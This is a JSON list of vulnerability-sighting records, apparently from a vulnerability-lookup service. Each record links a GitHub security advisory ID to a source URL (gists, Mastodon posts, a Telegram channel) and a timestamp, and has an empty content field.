{"uuid": "7cb9c373-677d-485c-9490-0c86a55f3888", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/ef436e86b0754e088500571855bb0c22", "content": "", "creation_timestamp": "2025-07-07T03:46:51.000000Z"}, {"uuid": "cba2afde-2e08-4bcb-950c-ab738afdbc58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/8dd60afb8cd1c3b9d24fb6d89deabbeb", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "30bed53f-4eef-4f45-97d8-8a878f70ca41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jw7r-rxff-gv24", "type": "seen", "source": "https://gist.github.com/safer-bot/10f03eee26c6b2d03eeb47e6979053b4", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "32cae1de-1c34-4f44-aee3-d502187da37f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g4gc-rh26-m3p5", "type": "seen", "source": "https://gist.github.com/safer-bot/10f03eee26c6b2d03eeb47e6979053b4", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "dd89162d-79cc-463d-b9b5-c9a25a0aed0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93ww-43rr-79v3", "type": "seen", "source": "https://gist.github.com/safer-bot/10f03eee26c6b2d03eeb47e6979053b4", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "10c80e14-5666-4841-b80c-a09a0f6b6ac6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jw7r-rxff-gv24", "type": "seen", "source": "https://gist.github.com/safer-bot/8dd60afb8cd1c3b9d24fb6d89deabbeb", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "ba8ce340-6092-4f65-b3a4-4ae86b535ed7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g4gc-rh26-m3p5", "type": "seen", "source": "https://gist.github.com/safer-bot/8dd60afb8cd1c3b9d24fb6d89deabbeb", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "9d78ce45-0bd6-4286-962e-734bf2458cad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93ww-43rr-79v3", "type": "seen", "source": "https://gist.github.com/safer-bot/8dd60afb8cd1c3b9d24fb6d89deabbeb", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "9efc7274-02a0-4a64-b141-7b8790340f6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h99m-6755-rgwc", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114347775337646077", "content": "", "creation_timestamp": "2025-04-16T13:03:04.185908Z"}, {"uuid": "ad6f0589-b47b-4b69-9044-de4758ad5c06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9339-86wc-4qgf", "type": "seen", "source": "https://gist.github.com/safer-bot/26a09b8c51878f5ec9a6e89f5b7d58cb", "content": "", "creation_timestamp": "2025-07-16T07:00:17.000000Z"}, {"uuid": "5b18f621-7c90-4154-af53-ee09cc4bfca4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pjch-4g28-fxx7", "type": "seen", "source": "https://gist.github.com/safer-bot/26a09b8c51878f5ec9a6e89f5b7d58cb", "content": "", "creation_timestamp": "2025-07-16T07:00:17.000000Z"}, {"uuid": "df26e00a-2f34-4745-a700-62a94864cfa9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h65f-jvqw-m9fj", "type": "seen", "source": "https://gist.github.com/safer-bot/26a09b8c51878f5ec9a6e89f5b7d58cb", "content": "", "creation_timestamp": "2025-07-16T07:00:17.000000Z"}, {"uuid": "169d0a0a-d5bc-41f6-b2e7-f6e80efc12e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fxph-q3j8-mv87", "type": "seen", "source": "https://gist.github.com/safer-bot/567be21617d06bab6da0400e15a90ea5", "content": "", "creation_timestamp": "2025-07-16T12:03:23.000000Z"}, {"uuid": "20a605e7-670d-4c6c-af85-19728b9ec950", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jfh8-c2jp-5v3q", "type": "seen", "source": "https://gist.github.com/safer-bot/567be21617d06bab6da0400e15a90ea5", "content": "", "creation_timestamp": "2025-07-16T12:03:23.000000Z"}, {"uuid": "87469bde-c2a2-4aa3-9d8a-0dfc441e34b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p6xc-xr62-6r2g", "type": "seen", "source": "https://gist.github.com/safer-bot/567be21617d06bab6da0400e15a90ea5", "content": "", "creation_timestamp": "2025-07-16T12:03:23.000000Z"}, {"uuid": "cfd06abc-a4a0-4c12-9653-1a455c38963a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7j4h-8wpf-rqfh", "type": "seen", "source": "https://gist.github.com/safer-bot/26a09b8c51878f5ec9a6e89f5b7d58cb", "content": "", "creation_timestamp": "2025-07-16T07:00:17.000000Z"}, {"uuid": "efae1f84-d032-4bef-8ecb-d6407d1602a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3f7h-mf4q-vrm4", "type": "seen", "source": "https://gist.github.com/safer-bot/26a09b8c51878f5ec9a6e89f5b7d58cb", "content": "", "creation_timestamp": "2025-07-16T07:00:17.000000Z"}, {"uuid": "fc520175-4790-4485-9fd3-79b5a974e734", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmqm-g3vh-847m", "type": "seen", "source": "https://gist.github.com/safer-bot/26a09b8c51878f5ec9a6e89f5b7d58cb", "content": "", "creation_timestamp": "2025-07-16T07:00:17.000000Z"}, {"uuid": "7f5ec7e4-416c-4720-88ed-cbe06e8b32aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w4jq-qh47-hvjq", "type": "seen", "source": "https://gist.github.com/safer-bot/26a09b8c51878f5ec9a6e89f5b7d58cb", "content": "", "creation_timestamp": "2025-07-16T07:00:17.000000Z"}, {"uuid": "8e6dc7df-e8f8-4cd1-922b-4c3b3d87eb04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6c5p-6www-pcmr", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114858278941700138", "content": "", "creation_timestamp": "2025-07-15T16:50:51.380794Z"}, {"uuid": "8a584c08-c2fb-4792-875f-3bd286cbf9ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7rjr-3q55-vv33", "type": "seen", "source": "https://gist.github.com/safer-bot/567be21617d06bab6da0400e15a90ea5", "content": "", "creation_timestamp": "2025-07-16T12:03:23.000000Z"}, {"uuid": "ed405dd1-8d3b-44c4-86b0-ee9c7e7a11bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/4d48df6f65653f3eea1794d9bbf60b13", "content": "", "creation_timestamp": "2025-07-16T07:01:22.000000Z"}, {"uuid": "bc3fbae7-5e74-4bce-8ffe-49f60717fecc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/4d48df6f65653f3eea1794d9bbf60b13", "content": "", "creation_timestamp": "2025-07-16T07:01:22.000000Z"}, {"uuid": "054682f7-120f-4c8e-ad7c-7f5f6f4ea57d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-53q9-r3pm-6pq6", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114359904676181462", "content": "", "creation_timestamp": "2025-04-18T16:27:43.162286Z"}, {"uuid": "d8011496-fca9-4860-97ac-656e18f75a4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m5px-pwq3-4p5m", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114359909527505857", "content": "", "creation_timestamp": "2025-04-18T16:28:57.370994Z"}, {"uuid": "3b8a83a5-0bba-4824-b7f0-2b2f73c1f0c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mg2h-6x62-wpwc", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114360071872639571", "content": "", "creation_timestamp": "2025-04-18T17:10:14.498428Z"}, {"uuid": "b3f0d202-8b2a-4d25-a2f9-a4b06564fa29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7xq5-54jp-2mfg", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114360879207101550", "content": "", "creation_timestamp": "2025-04-18T20:35:33.415648Z"}, {"uuid": "93764352-a110-4b28-8193-cb1f42a9e609", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6FX6-WRPF-CPGV", "type": "seen", "source": "https://t.me/brutsecurity/1014", "content": "", "creation_timestamp": "2026-07-10T00:00:36.081998Z"}, {"uuid": "b7636088-8a1d-4dfd-b3ad-3e05cd63682e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/4d48df6f65653f3eea1794d9bbf60b13", "content": "", "creation_timestamp": "2025-07-16T07:01:22.000000Z"}, {"uuid": "eac6e5af-1922-435c-99da-52c12c3723b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/4d48df6f65653f3eea1794d9bbf60b13", "content": "", "creation_timestamp": "2025-07-16T07:01:22.000000Z"}, {"uuid": "a53da63d-37e1-4e36-8bcd-27ecdab089a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3vqj-43w4-2q58", "type": "seen", "source": "https://gist.github.com/safer-bot/4d48df6f65653f3eea1794d9bbf60b13", "content": "", "creation_timestamp": "2025-07-16T07:01:22.000000Z"}, {"uuid": "413c3d0c-61b0-4026-8b7c-f0dc73b011e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/4d48df6f65653f3eea1794d9bbf60b13", "content": "", "creation_timestamp": "2025-07-16T07:01:22.000000Z"}, {"uuid": "8ea380e7-b370-41b0-96c6-407f7d08f9da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jq9-2xhw-jpx7", "type": "seen", "source": "https://gist.github.com/safer-bot/4d48df6f65653f3eea1794d9bbf60b13", "content": "", "creation_timestamp": "2025-07-16T07:01:22.000000Z"}, {"uuid": "496fa67b-8152-4794-b4bf-6d37d4a9ffe9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcwr-x25h-x5fh", "type": "seen", "source": "https://gist.github.com/safer-bot/8978b70b7a8d7d0e26a4583e47ba4b17", "content": "", "creation_timestamp": "2025-07-16T10:08:23.000000Z"}, {"uuid": "8b14ae77-1352-4c6d-8a8a-41b98e5f7984", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/8978b70b7a8d7d0e26a4583e47ba4b17", "content": "", "creation_timestamp": "2025-07-16T10:08:23.000000Z"}, {"uuid": "45d966f3-5248-4260-95ca-110967d1d7d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/daef4c5970c7d644dd13aed25276a8e8", "content": "", "creation_timestamp": "2025-07-16T07:00:49.000000Z"}, {"uuid": "d5358433-cf22-430c-8bfb-be3163075b98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/daef4c5970c7d644dd13aed25276a8e8", "content": "", "creation_timestamp": "2025-07-16T07:00:49.000000Z"}, {"uuid": "0dead246-ae49-404b-a8bb-51d39ca4fe74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/daef4c5970c7d644dd13aed25276a8e8", "content": "", "creation_timestamp": "2025-07-16T07:00:49.000000Z"}, {"uuid": "696ce314-6538-480f-83f2-c5c7cfe4d7fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/8978b70b7a8d7d0e26a4583e47ba4b17", "content": "", "creation_timestamp": "2025-07-16T10:08:23.000000Z"}, {"uuid": "71c070fa-46eb-4b6d-b895-12fb32231084", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wf8f-6423-gfxg", "type": "seen", "source": "https://gist.github.com/safer-bot/8978b70b7a8d7d0e26a4583e47ba4b17", "content": "", "creation_timestamp": "2025-07-16T10:08:23.000000Z"}, {"uuid": "430e682d-e7d9-44da-887e-e87696a47997", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/8978b70b7a8d7d0e26a4583e47ba4b17", "content": "", "creation_timestamp": "2025-07-16T10:08:23.000000Z"}, {"uuid": "a060892b-e0f9-4b68-a781-47cfd969ea7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/daef4c5970c7d644dd13aed25276a8e8", "content": "", "creation_timestamp": "2025-07-16T07:00:49.000000Z"}, {"uuid": "d4d85c9e-3b23-43b6-a89b-c8bcdd901290", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/daef4c5970c7d644dd13aed25276a8e8", "content": "", "creation_timestamp": "2025-07-16T07:00:49.000000Z"}, {"uuid": "71c7c97b-f9dc-457b-8fdf-96faf0700841", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/daef4c5970c7d644dd13aed25276a8e8", "content": "", "creation_timestamp": "2025-07-16T07:00:49.000000Z"}, {"uuid": "309387ae-9930-4dec-b8f0-2aee0874abdd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/7caa1bd78e60ab31ee0b262088ef29de", "content": "", "creation_timestamp": "2025-07-16T07:02:53.000000Z"}, {"uuid": "62505969-74a4-4bf8-aade-39385c86234c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/7caa1bd78e60ab31ee0b262088ef29de", "content": "", "creation_timestamp": "2025-07-16T07:02:53.000000Z"}, {"uuid": "8a481701-b2cd-4e3a-a21c-560a09a34e4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/7caa1bd78e60ab31ee0b262088ef29de", "content": "", "creation_timestamp": "2025-07-16T07:02:53.000000Z"}, {"uuid": "36a78604-7b66-40ed-bb46-57b9fccd7c6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g6ph-x5wf-g337", "type": "seen", "source": "https://gist.github.com/safer-bot/8978b70b7a8d7d0e26a4583e47ba4b17", "content": "", "creation_timestamp": "2025-07-16T10:08:23.000000Z"}, {"uuid": "2c993842-72ff-4f32-854d-26975373e397", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-264p-99wq-f4j6", "type": "seen", "source": "https://gist.github.com/safer-bot/8978b70b7a8d7d0e26a4583e47ba4b17", "content": "", "creation_timestamp": "2025-07-16T10:08:23.000000Z"}, {"uuid": "37aec916-0a27-42be-819e-4ea5854822bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8489-44mv-ggj8", "type": "seen", "source": "https://gist.github.com/safer-bot/567be21617d06bab6da0400e15a90ea5", "content": "", "creation_timestamp": "2025-07-16T12:03:23.000000Z"}, {"uuid": "c2837e2f-fef0-4a4c-be5c-3a9aec2f64d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vwqq-5vrc-xw9h", "type": "seen", "source": "https://gist.github.com/safer-bot/567be21617d06bab6da0400e15a90ea5", "content": "", "creation_timestamp": "2025-07-16T12:03:23.000000Z"}, {"uuid": "839565eb-ff34-483f-8ada-8fa835e5d5b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/daef4c5970c7d644dd13aed25276a8e8", "content": "", "creation_timestamp": "2025-07-16T07:00:49.000000Z"}, {"uuid": "84671eb5-00f6-42f1-af40-14c5d1ca9d0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/daef4c5970c7d644dd13aed25276a8e8", "content": "", "creation_timestamp": "2025-07-16T07:00:49.000000Z"}, {"uuid": "3aa86f18-8e27-493a-8ba7-07fd259e2936", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/7caa1bd78e60ab31ee0b262088ef29de", "content": "", "creation_timestamp": "2025-07-16T07:02:53.000000Z"}, {"uuid": "b4d3aa67-c00e-4674-9e8a-cec2e1830e65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/7caa1bd78e60ab31ee0b262088ef29de", "content": "", "creation_timestamp": "2025-07-16T07:02:53.000000Z"}, {"uuid": "95660e8e-6326-4323-96ea-3c87bdd10b27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/7caa1bd78e60ab31ee0b262088ef29de", "content": "", "creation_timestamp": "2025-07-16T07:02:53.000000Z"}, {"uuid": "fa864bba-ef06-40d8-8a94-650e99ac8002", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/8978b70b7a8d7d0e26a4583e47ba4b17", "content": "", "creation_timestamp": "2025-07-16T10:08:23.000000Z"}, {"uuid": "bd8b863f-cf64-41f7-9a13-030f9cc5171e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xq3w-v528-46rv", "type": "seen", "source": "https://gist.github.com/safer-bot/4f0365a5003239f65288d5f184de3512", "content": "", "creation_timestamp": "2025-07-16T12:02:49.000000Z"}, {"uuid": "28946ee6-99fa-4e03-a6ef-61428bfadb9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-33qr-m49q-rxfx", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114383596774137374", "content": "", "creation_timestamp": "2025-04-22T20:52:56.017909Z"}, {"uuid": "17088783-c5c8-4ac3-8bd2-7d0c471daa25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/97d935c317385e026121b4d318d8c4ed", "content": "", "creation_timestamp": "2025-07-16T07:30:33.000000Z"}, {"uuid": "b6633f0b-fcda-4b50-8d63-20dd9380c58d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": "https://gist.github.com/safer-bot/97d935c317385e026121b4d318d8c4ed", "content": "", "creation_timestamp": "2025-07-16T07:30:33.000000Z"}, {"uuid": "020611c1-0b7d-49a2-b9fe-65d5b222643f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/97d935c317385e026121b4d318d8c4ed", "content": "", "creation_timestamp": "2025-07-16T07:30:33.000000Z"}, {"uuid": "09120992-4996-466e-90c9-a42bf263f4d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/97d935c317385e026121b4d318d8c4ed", "content": "", "creation_timestamp": "2025-07-16T07:30:33.000000Z"}, {"uuid": "041818d4-1010-4046-8409-ba3ed6ba6f4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7r6m-qjwm-w44q", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114552716789860574", "content": "", "creation_timestamp": "2025-05-22T17:42:22.606306Z"}, {"uuid": "ea6f9b1f-46a4-48ef-9f09-a1ee4b4e1520", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2grh-7mhv-fcfw", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114552721469007874", "content": "", "creation_timestamp": "2025-05-22T17:43:36.780264Z"}, {"uuid": "d063d993-3a31-4ddc-971f-e2d29fda2c45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/83d91599672399ce0def1e7af790f1b1", "content": "", "creation_timestamp": "2025-07-16T07:30:01.000000Z"}, {"uuid": "f4f7c72f-4703-4fd0-a31a-eae5fd3047cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/83d91599672399ce0def1e7af790f1b1", "content": "", "creation_timestamp": "2025-07-16T07:30:01.000000Z"}, {"uuid": "48684165-b4e6-4d7c-918c-396249d603b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": "https://gist.github.com/safer-bot/886c55d451a39a81c4d002ee918f1abe", "content": "", "creation_timestamp": "2025-07-16T12:04:21.000000Z"}, {"uuid": "ed0248ee-76ad-4fa8-90e8-9b6868aad311", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/886c55d451a39a81c4d002ee918f1abe", "content": "", "creation_timestamp": "2025-07-16T12:04:21.000000Z"}, {"uuid": "80cd982a-f80c-45d7-97f8-70a9a722a369", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-83qj-6fr2-vhqg", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/114705217531044379", "content": "", "creation_timestamp": "2025-06-18T16:05:19.915620Z"}, {"uuid": "1f824980-53bf-4ff3-8b98-edda38a4bfc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", 